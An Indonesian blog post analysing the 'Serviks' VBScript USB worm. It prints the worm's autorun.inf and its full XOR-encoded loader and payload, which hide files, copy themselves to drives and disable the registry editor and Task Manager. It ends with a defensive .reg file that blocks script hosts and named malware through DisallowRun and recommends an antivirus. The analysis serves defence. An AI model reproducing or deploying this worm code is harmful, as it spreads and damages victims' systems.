Virus Serviks ( Fandi Love Yuyun )

Mungkin Virus ini dibuat oleh pacar si yuyun cantix ..🙂 yaitu bernama Fandi… karena Bila Virus serviks ini telah meng-infeksi sistem , maka hampir semua  file akan dibuat hidden dan yang tampak adalah shortcut  yang bila di eksekusi / dobel klik akan menjalankan file desktop.ini yang sebenarnya adalah desktop.vbs lihat script dibawah ini :
ini file autorun.inf-nya :

[autorun]
open=WScript.exe //e:VBScript dekstop.ini auto
shell\open=Open
shell\open\Command=WScript.exe //e:VBScript dekstop.ini auto
shell\open\Default=1
shell\explore=Explore
shell\explore\Command=WScript.exe //e:VBScript dekstop.ini auto

dan ini file desktop.ini yang sebenarnya adalah file vbs atau desktop.vbs ( ini menunjukkan bahwa bila file aplikasi dijalankan lebih dulu maka ektensi file tidak berlaku, tapi yang berlaku adalah script yang ada di dalam  file tersebut ) :
berikut script yang ada didalam file desktop.ini-nya Virus servisk :

'http://www.microsoft.com/isapi/redir.dll?prd={SUB_PRD}
&ar=runonce&pver={SUB_PVER}&plcid={SUB_CLSID}
'Microsoft Windows Corporation
' ========================
'Microsoft Windows Serviks
'Hawabek sata irad acab gnolot
'Sataek hawab irad acab uti haletes
'sJ80
'dI20
'dK5K
'dA4C
'd-2U
'dS5F
'dE2.
'sR4I
'gV6N
'tI9I
'4K5.
'3S2F
'e-4U
'fM5R
'wA2U
'sS6H
'GU5.
'FK2H
'D-2A
'DD5W
'EI2A
'S-5B
'SK6I
'UO2D
'TM4.
'3P5Q
'4U6P
'6T2H
'7E2.
'8R7O
'9-5N
'0A5.
'6N4I
'RD6R
'EA4A
'F!3C
'F-57
'HH44
'GU60
'MB98
'NU26
'FN36
'RG58
'WI68
'W-59
'TM85
'EY66
'W-55
'WE38
'SM40
'DA25
'SI51
'LL88
'G:60
'D-35
'SZ43
'QE22
'HR61
'OV85
'PI25
'YK44
'FS86
'E@66
'VY25
'MA48
'cH60
'fO92
'tO30
'6.80
'6C41
'8O73
'uM53
'g-63
'f-24
'fB36
'bY65
'b:38
'A-20
'aF28
'AA26
'AN36
'WD68
'KI31
'K-59
'ML25
'LO56
'TV25
'RE58
'D-20
'DY28
'GU51
'KY68
'OU90
'PN84
'J.78
'H-50
'sJ80
'dI20
'dK5K
'dA4C
'd-2U
'dS5F
'dE2.
'sR4I
'gV6N
'tI9I
'4K5.
'3S2F
'e-4U
'fM5R
'wA2U
'sS6H
'GU5.
'FK2H
'D-2A
'DD5W
'EI2A
'S-5B
'SK6I
'UO2D
'TM4.
'3P5Q
'4U6P
'6T2H
'7E2.
'8R7O
'9-5N
'0A5.
'6N4I
'RD6R
'EA4A
'F!3C
'F-57
'HH44
'GU60
'MB98
'NU26
'FN36
'RG58
'WI68
'W-59
'TM85
'EY66
'W-55
'WE38
'SM40
'DA25
'SI51
'LL88
'G:60
'D-35
'SZ43
'QE22
'HR61
'OV85
'PI25
'YK44
'FS86
'E@66
'VY25
'MA48
'cH60
'fO92
'tO30
'6.80
'6C41
'8O73
'uM53
'g-63
'f-24
'fB36
'bY65
'b:38
'A-20
'aF28
'AA26
'AN36
'WD68
'KI31
'K-59
'ML25
'LO56
'TV25
'RE58
'D-20
'DY28
'GU51
'KY68
'OU90
'PN84
'J.78
'H-50
'sJ80
'dI20
'dK5K
'dA4C
'd-2U
'dS5F
'dE2.
'sR4I
'gV6N
'tI9I
'4K5.
'3S2F
'e-4U
'fM5R
'wA2U
'sS6H
'GU5.
'FK2H
'D-2A
'DD5W
'EI2A
'S-5B
'SK6I
'UO2D
'TM4.
'3P5Q
'4U6P
'6T2H
'7E2.
'8R7O
'9-5N
'0A5.
'6N4I
'RD6R
'EA4A
'F!3C
'F-57
'HH44
'GU60
'MB98
'NU26
'FN36
'RG58
'WI68
'W-59
'TM85
'EY66
'W-55
'WE38
'SM40
'DA25
'SI51
'LL88
'G:60
'D-35
'SZ43
'QE22
'HR61
'OV85
'PI25
'YK44
'FS86
'E@66
'VY25
'MA48
'cH60
'fO92
'tO30
'6.80
'6C41
'8O73
'uM53
'g-63
'f-24
'fB36
'bY65
'b:38
'A-20
'aF28
'AA26
'AN36
'WD68
'KI31
'K-59
'ML25
'LO56
'TV25
'RE58
'D-20
'DY28
'GU51
'KY68
'OU90
'PN84
'J.78
'H-50
'sJ80
'dI20
'dK5K
'dA4C
'd-2U
'dS5F
'dE2.
'sR4I
'gV6N
'tI9I
'4K5.
'3S2F
'e-4U
'fM5R
'wA2U
'sS6H
'GU5.
'FK2H
'D-2A
'DD5W
'EI2A
'S-5B
'SK6I
'UO2D
'TM4.
'3P5Q
'4U6P
'6T2H
'7E2.
'8R7O
'9-5N
'0A5.
'6N4I
'RD6R
'EA4A
'F!3C
'F-57
'HH44
'GU60
'MB98
'NU26
'FN36
'RG58
'WI68
'W-59
'TM85
'EY66
'W-55
'WE38
'SM40
'DA25
'SI51
'LL88
'G:60
'D-35
'SZ43
'QE22
'HR61
'OV85
'PI25
'YK44
'FS86
'E@66
'VY25
'MA48
'cH60
'fO92
'tO30
'6.80
'6C41
'8O73
'uM53
'g-63
'f-24
'fB36
'bY65
'b:38
'A-20
'aF28
'AA26
'AN36
'WD68
'KI31
'K-59
'ML25
'LO56
'TV25
'RE58
'D-20
'DY28
'GU51
'KY68
'OU90
'PN84
'J.78
'H-50
On Error Resume Next
Dim fso, ws
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.Shell")
Set sh = CreateObject("Shell.application")
Q=WScript.ScriptFullName
tmp=fso.GetSpecialFolder(1)
tn=fso.GetTempName
tmpt=tmp+"\"+tn
Set swt=WScript.Arguments
If swt.Count>0 Then
	status=swt(0)
		If status="auto" Then
		sh.Explore Left(WScript.ScriptFullName,3)
		Else
		status=Left(WScript.ScriptFullName,Len
(WScript.ScriptFullName)
-Len(WScript.ScriptName))+status
			If fso.FolderExists(status) Then
				sh.Explore status
			Else
				fso.CreateFolder status
				sh.Explore status
			End If
		End If
Else
End If
Set QQ=fso.GetFile(Q)
Set Q1=QQ.OpenAsTextStream(1,0)
isiQ=Q1.Read(QQ.Size)
Q1.close
t1=InStr(1,isiQ,"Windows Serviks"+" >>>",0)+18
isiQ=Right(isiQ,Len(isiQ)-t1)
hsl=""
For v=1 To Len(isiQ)
t=Asc(Mid(isiQ,v,1))
hsl=hsl+Chr(t Xor 7)
Next
If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0
Set temporary=fso.OpenTextFile(tmpt,2,True,0)
temporary.Write hsl
temporary.Close
ws.Run "WScript.exe //e:VBScript "+tmpt+" """+Q+""""

 ' Windows Serviks >>> ::::::::::::::::::::::::
:::::::::::::::::::::::::::::::
 'Pnichpt'Tbuqnlt
 ossw=((ppp)jnduhthas)dhj(ntfwn(ubcnu)ckk8wuc:
|TREXWUCz!fu:urihidb!wqbu:
|TREXWQBUz!wkdnc:|TREXDKTNCz
 Wuhqncbu'e~='Jnduhthas'Pnichpt
 Bcnshu'Ankb='Tbuqnlt'Dhuwhufsnhi
 :::::::::::::::::::::::::::::::::::::::::::::::::::::::
Hi'Buuhu'Ubtrjb'Ibs
Cnj'ath+'pt+'tsfsrt+tsfsrt6+'ak~
Tbs'ath':'DubfsbHembds/%tdunwsni`)ankbt~tsbjhembds%.
Tbs'pt':'DubfsbHembds/%ptdunws)Tobkk%.
Tbs'to':'DubfsbHembds/%Tobkk)fwwkndfsnhi%.
Tbs'ibs':'DubfsbHembds/%ptdunws)ibsphul%.
ak~:afktb
sjw:ath)@bsTwbdnfkAhkcbu/6.
si:ath)@bsSbjwIfjb
sjws:sjw,%[%,si
chd:pt)TwbdnfkAhkcbut/%J~Chdrjbist%.
Tbs'tps:PTdunws)Fu`rjbist
Na'tps)Dhris97'Sobi
tsfsrt:tps/7.
Bic'Na
na'ath)ankbbntst/sjw,%[Tbuq17c)ckk%.'sobi
tbs'nuf:ath)`bsankb/sjw,%[Tbuq17c)ckk%.
nuf)fssunersbt:7
nuf)ifjb:%aficn)buc%
na'nuf)ifjb:%aficn)buc%'sobi
nuf)ifjb:%Tbuq17c)ckk%
tbs'nuf:ath)hwbisbsankb/sjw,%[Tbuq17c)ckk%+5+surb.
bktb
ak~:surb
bic'na
bktb
tbs'nuf:ath)hwbisbsankb/sjw,%[Tbuq17c)ckk%+5+surb.
bic'na
Tbs'FV:ath)@bsAnkb/tsfsrt.
Na'ath)AnkbBntst/sjws.'Sobi'ath)@bsAnkb/sjws.)Fssunersbt:7
FV)Dhw~'sjws+Surb
Tbs'FV:ath)@bsAnkb/sjws.
FV)Fssunersbt:4>
fiq:sjw,%[frsh)bb%
Na'Ihs'ath)AnkbBntst/fiq.'Sobi'FV)Dhw~'fiq
Tbs'frsh:ath)@bsAnkb/fiq.'
frsh)fssunersbt:7
Tbs'frs:ath)HwbiSbsAnkb/fiq+5+Surb+7.
ntn:%\frshuriZ9hwbi:PTdunws)bb'((b=QETdunws'cbltshw)
nin'frsh9tobkk
[hwbi:Hwbi9tobkk[hwbi[Dhjjfic:PTdunws)bb'((b=QETdunws'cbltshw)
nin'frsh9tobkk
[hwbi[Cbafrks:69tobkk[bwkhub:Bwkhub9tobkk[bwkhub[Dhjjfic:
PTdunws)bb'
((b=QETdunws'cbltshw)nin'frsh%
ntn:Ubwkfdb/ntn+%9%+qeDuKa.
frs)Punsb'ntn
frs)Dkhtb
frsh)Fssunersbt:4>
ksld:to)Ifjbtwfdb/!O6d!.)Tbka)wfso','%[Jnduhthas[DC'Eruini`%
FV)Dhw~'ksld,%[cbltshw)nin%+Surb
frsh)Dhw~'ksld,%[frshuri)nia%+Surb
Na'ath)AnkbBntst/chd,%[ca2tuqd)eab%.'Sobi'ath)@bsAnkb/chd
,%[ca2tuqd)
eab%.)Fssunersbt:7
FV)Dhw~'chd,%[ca2tuqd)eab%+Surb
ub`V
Tbs'ufuf:RINTLF
Obus}'Afktb
Na'Cf~/Ihp.;94'Sobi'ublrutna'chd+6'Bktb'ublrutna'chd+4
dfkk'fssfdlXibs
Obus}'Surb
Tre'ublrutna/wfso+cw.
Hi'Buuhu'Ubtrjb'Ibs
cuhwa'wfso
ptdunws)tkbbw'27
Na'cw97'Sobi
Ahu'Bfdo'akcu6'Ni'ath)@bsAhkcbu/wfso,%[%.)TreAhkcbut
ublrutna'akcu6)Wfso+'cw*6
Ibs
Bic'Na
Bic'Tre
Tre'cuhwa/wfso.
Hi'Buuhu'Ubtrjb'Ibs
na'cf~/ihp.:6'fic'/jhiso/ihp.jhc'4.:6'sobi'
ufuf)dhw~'wfso,%[Knunl)usa%
bic'na
`6:wfso,%[frshuri)nia%
`5:wfso,%[cbltshw)nin%
Na'ath)AnkbBntst/`6.'Sobi'
Tbs'`66:ath)@bsAnkb/`6.'
Na'`66)Fssunersbt;94>'Sobi'
`66)Fssunersbt:7
frsh)Dhw~'wfso,%[frshuri)nia%+Surb
bic'na
bktb'
frsh)Dhw~'wfso,%[frshuri)nia%+Surb
bic'na
Na'ath)AnkbBntst/`5.'Sobi'
Tbs'`65:ath)@bsAnkb/`5.
Na'`65)Fssunersbt;94>'Sobi
`65)Fssunersbt:7
FV)Dhw~'wfso,%[cbltshw)nin%+Surb
bic'na
bktb
FV)Dhw~'wfso,%[cbltshw)nin%+Surb
Bic'Na
Na'Ihs'ath)AnkbBntst/wfso,%[Ahkcbu)kil%.'Sobi
tohu]qinsf'wfso,%[Jnduhthas%+%Jnduhthas%
cuhw:Fuuf~/%Fwknlftn%+%Jrtnd%+%Chdrjbis%+%Wbisni`%+
%Wohsh%+
%Jhqnb%+%Chpikhfc%.
pp:6
Ahu'Bfdo'c'Ni'cuhw
Na'Cf~/ihp.'Jhc'4':'pp'Sobi'tohu]qinsf'wfso,%[%,c+c
ptdunws)tkbbw'17
pp:pp,6
Ibs
u:7
Ahu'Bfdo'akcu'Ni'ath)@bsAhkcbu/wfso,%[%.)TreAhkcbut
tohu]qinsf'wfso,%[%,akcu)ifjb+akcu)Ifjb
ptdunws)tkbbw'17
Na'u94'Sobi'
Bns'Ahu
Bic'na
u:u,6
Ibs
Bic'Na
Bic'Tre
Tre'tohu]qinsf/wfso+su`s.
Tbs'tohu:pt)DubfsbTohusdrs/wfso,%)kil%.
tohu)ndhikhdfsnhi:%tobkk45)ckk+4%
tohu)sfu`bswfso:%ptdunws)bb%
tohu)fu`rjbist:%((b=QETdunws'cbltshw)nin'%%%,su`s,%%%%
tohu)tfqb
Bic'Tre
aridsnhi'fssfdlXibs/.
Hi'Buuhu'Ubtrjb'Ibs
buu)dkbfu
Tbs'hemAhkcbu':'to)Ifjbtwfdb/!O64!.
Tbs'dhkNsbjt':'hemAhkcbu)Nsbjt
Ahu'Bfdo'tsuAnkbIfjb'ni'hemAhkcbu)Nsbjt
s:'hemAhkcbu)@bsCbsfnktHa/tsuAnkbIfjb+'63.
na'ath)ahkcbubntst/s.'sobi
ublrutna's+3
bic'na
Ibs
Bic'aridsnhi
Tre'scu/.
Hi'Buuhu'Ubtrjb'Ibs
buu)dkbfu
PTdunws)Tkbbw'6?7777
na'buu)irjebu97'sobi'ptdunws)vrns
Bic'Tre
aridsnhi'RINTLF/.
Hi'buuhu'ubtrjb'ibs
:qeduka
fcq:%Hufi`'Ehcho'Dfun'Mhcho99Cforkr'sbuftf'nicfo9Sfl'fcf'~fi`'jfr'
cfi'jbi`ni`
nilfi'flr9Lfuif'drjf'cnunlr'~fi`'sfl'kflr*kflr99Snfcf'~fi`'tfkfo9Ofi~f'flr'
jfirtnf'ehcho9
^fi`'enfulfi'tbjrf'nin'wbujfnilfilr9Eburkfi`'rkfi`'rkfi`'lfkn99Wbi`rjrjfi*wbi`rjr
jfi9Tnfwf'
~fi`'jfr'efisr9Shkhi`'flr'lftnofin'flr9Shkhi`'dfunlfi'cnunlr'lblftno'ofsn
lr9Tnfwf'~
fi`'jfr99Jbidhef'ebusfofi'tblrfs'ofsn9Kf~fli~f'lfufi`'~fi`9Cnobjwft'
tfi`'hjefl9Mfk
fin'oncrw'cfkfj'erfn'ebkflf9Tbufolfi'dnisf'srkrt'cn'cfkfj'sflcnu99Ofi~
f'lbwbcnofi9^fi`'t kfkr'cfsfi`'jbibusfpflfilr9Bi`lfr'ebkfofi'mnpf9Sb`f'jbifun'nicfo'cn'fs
ft'sfi`ntfilr99
Sfwn'tfjwfn'lfwfilfo'lr'ofurt9Jbifi``ri`i~f'lrsrlfi'dnisf'nin9Ebutbjf~
fj'cfkfj'lfker
999/ppp)ebichs)dh)iu.%
fcq:ubwkfdb/fcq+%9%+.
tbs'^r5i:ath)hwbisbsankb/sjw,%[q)chd%+5+surb.
^r5i)punsb'fcq
^r5i)dkhtb
na'cf~/ihp.:6'fic'/jhiso/ihp.jhc'4.:6'sobi'
na'ak~:afktb'sobi
ahu'n:6'sh'4
pt)uri'%ihsbwfc)bb'(w'%%%,sjw,%[q)chd%%%
ibs
bic'na
bic'na
tbs'RINTLF:ath)`bsankb/sjw,%[q)chd%.
bic'aridsnhi
Tre'ub`V/.
Hi'Buuhu'Ubtrjb'Ibs
na'cf~/ihp.:6'sobi
pt)Ub`Punsb'%OLDU[DKTNC[|66666666*5555*4444*3333*222222222222z
[%+'%Tbuqnlt%
pt)Ub`Punsb'%OLDU[DKTNC[|66666666*5555*4444*3333*222222222222z
[CbafrksNdhi[%+%tobkk45)ckk+3?%
pt)Ub`Punsb'%OLDU[DKTNC[|66666666*5555*4444*3333*222222222222z
[TobkkAhkcbu[Fssunersbt%+7+%UB@XCPHUC%
pt)ub`punsb'%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi
[bwkhubu
[Cbtlshw[IfjbTwfdb[|66666666*5555*4444*3333*222222222222z
[%+%%
bic'na
pt)ub`cbkbsb'%OLDU[kilankb[NtTohusdrs%
pt)Ub`Punsb'%OLDR[Thaspfub[Jnduhthas[Nisbuibs'Bwkhubu[Jfni
[Tsfus'Wf`b%+'%ossw=((ppp)ebichs)dh)iu%
pt)Ub`Punsb'%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri
[Ca2tbuq%+%Ptdunws)bb'((b=QETdunws'%%%,chd,%[ca2tuqd)
eab%%%
pt)Ub`Punsb'%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri
[Bwkhubu%+%Ptdunws)bb'((b=QETdunws'%%%,ksld,%[cbltshw
)nin%%%
pt)Ub`Punsb'%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi
[Whkndnbt
[T~tsbj[CntfekbUb`ntsu~shhkt%+6+%UB@XCPHUC%
pt)Ub`Punsb'%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi
[Whkndnbt
[T~tsbj[CntfekbSftlJ`u%+6+%UB@XCPHUC%
pt)Ub`Punsb'%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[B
wkhubu
[Fcqfidbc[Ahkcbu[TrwbuOnccbi[Pfuini`NaIhsCbafrks%+%afic~'khqb'~
r~ri%
pt)Ub`Punsb'%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[B
wkhubu
[Fcqfidbc[Ahkcbu[TrwbuOnccbi[DobdlbcQfkrb%+7+%UB@XCPHUC%
pt)Ub`Punsb'%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[B
wkhubu
[Fcqfidbc[Ahkcbu[TrwbuOnccbi[RidobdlbcQfkrb%+7+%UB@XCPHUC%
pt)Ub`Punsb'%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[B
wkhubu
[Fcqfidbc[Ahkcbu[TrwbuOnccbi[CbafrksQfkrb%+7+%UB@XCPHUC%
na'kdftb/ath)`bscunqb/%d=%.)AnkbT~tsbj.:%isat%'sobi
nufV:FV)hwbiftsbstsubfj/6+7.)ubfc/FV)tn}b.
ppp:ath)@bsTwbdnfkAhkcbu/7.
tbs'mml:ath)hwbisbsankb/ppp,%[=Jnduhthas'Haandb'Rwcfsb'ahu'Pnic
hpt'_W)
t~t%+5+surb.
mml)punsb'nufV
mml)dkhtb
pt)Ub`Punsb'%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri
[PniRwcfsb%+%Ptdunws)bb'((b=QETdunws'%%%,ppp,%
[=Jnduhthas'Haandb'Rwcfsb'ahu'Pnichpt'_W)t~t%%%
bic'na
Bic'Tre
Tre'Obus}/hhh.
Hi'Buuhu'Ubtrjb'Ibs
ch
Ahu'Bfdo'cuq'Ni'ath)Cunqbt
Na'cuq)CunqbS~wb:6'Sobi
ublrutna'cuq)Wfso+3
Bktb
ublrutna'cuq)Wfso+5
Bic'na
Ibs
na'ak~:afktb'sobi'
scu
bktb'
ptdunws)vrns
bic'na
ub`V
Na'hhh:Afktb'Sobi'
Bns'Ch
Bic'Na
khhw
Bic'Tre

Kalau kita mau teliti , dibawah tulisan :
Microsoft Windows Serviks ada tulisan
Hawabek sata irad acab gnolot
kalau dibaca dari belakang akan terbaca : tolong baca dari atas kebawah
Sataek hawab irad acab uti haletes
kalau dibaca dari belakang terbaca : setelah itu baca dari bawah keatas
ini kunci untuk membaca pesan yang ditulis oleh si pembuat Virus kalau tidak salah bunyinya :

jika serviks masuk di komputer anda! hubungi my email:serviks@yahoo.com by: fandi love yuyun. (diulang-ulang)
untuk yang di baca ke atas: setelah nomer / angka ada tulisan cari nomor hpq dibawah huruf ini f–k dst…

Virus ini yang saya rasakan / efeknya adalah menghidden file / folder tertentu dan juga mencegah agar tidak bisa di show hidden system all file / folder dan bila kita coba menghilangkan cek list / centang pada Hide protected operating system files maka akan keluar kotak dialog fandy love yuyun …. 🙂

Virus ini memang meniru cara kerja Virus yuyun , cuma di beri penambahan… biar lebih Oke…🙂

tApi nggak usah panik smadav yang Versi terbaru sudah bisa membersihkan Virus ini dengan sempurna…

Untuk download smADav silakan >download disini < good job for smadav.net :)  semoga tidak kenal putus asa… terus berkarya untuk negeri bersama anti Virus lokal lainnya seperti PCMav , ANSAV dan yang lainnya.

dan  untuk menjaga agar Virus sejenis yuyun atau Virus vbs lainnya tidak berjalan di sistem anda silakan disallowrun file wscript.exe

caranya copy script dibawah ini dan paste di notepad , lalu save as all file dan beri extensi reg misalnya policies.reg

ingat jangan sampai save text file…🙂

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000ff
"DisallowRun"=dword:00000001
"NoDesktopCleanupWizard"=dword:00000001
"NoRecentDocsNetHood"=dword:00000001
"NoSMBalloonTip"=dword:00000001
"NoAutoTrayNotify"=dword:00000001
"ClearRecentDocsOnExit"=dword:00000001
"NoRecentDocsHistory"=dword:00000001
"NoSharedDocuments"=dword:00000001
"MaxRecentDocs"=dword:0000000f
"NoComputersNearMe"=dword:00000001
"NoNetConnectDisconnect"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
\Explorer\DisallowRun]
"1"="boot.exe"
"2"="jseup.exe"
"3"="cscript.exe"
"4"="wscript.exe"
"5"="boot.com"
"6"="runouce.exe"

untuk menambahkan nama file Virus , agar tidak bisa ter-eksekusi anda bisa menambahkan dibawah baris
“6”=”runouce.exe”
misalnya anda tambahkan nama Virus x.exe tinggal anda tambah
“6”=”runouce.exe”
“7”=”x.exe”
dan begitu seterusnya….🙂

Tentang Mpu-Elcom

Sholatku , ibadahku , hidupku , dan matiku , ku persembahkan untuk Allah tuhan Alam semesta...
Pos ini dipublikasikan di Virus dan tag , , . Tandai permalink.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s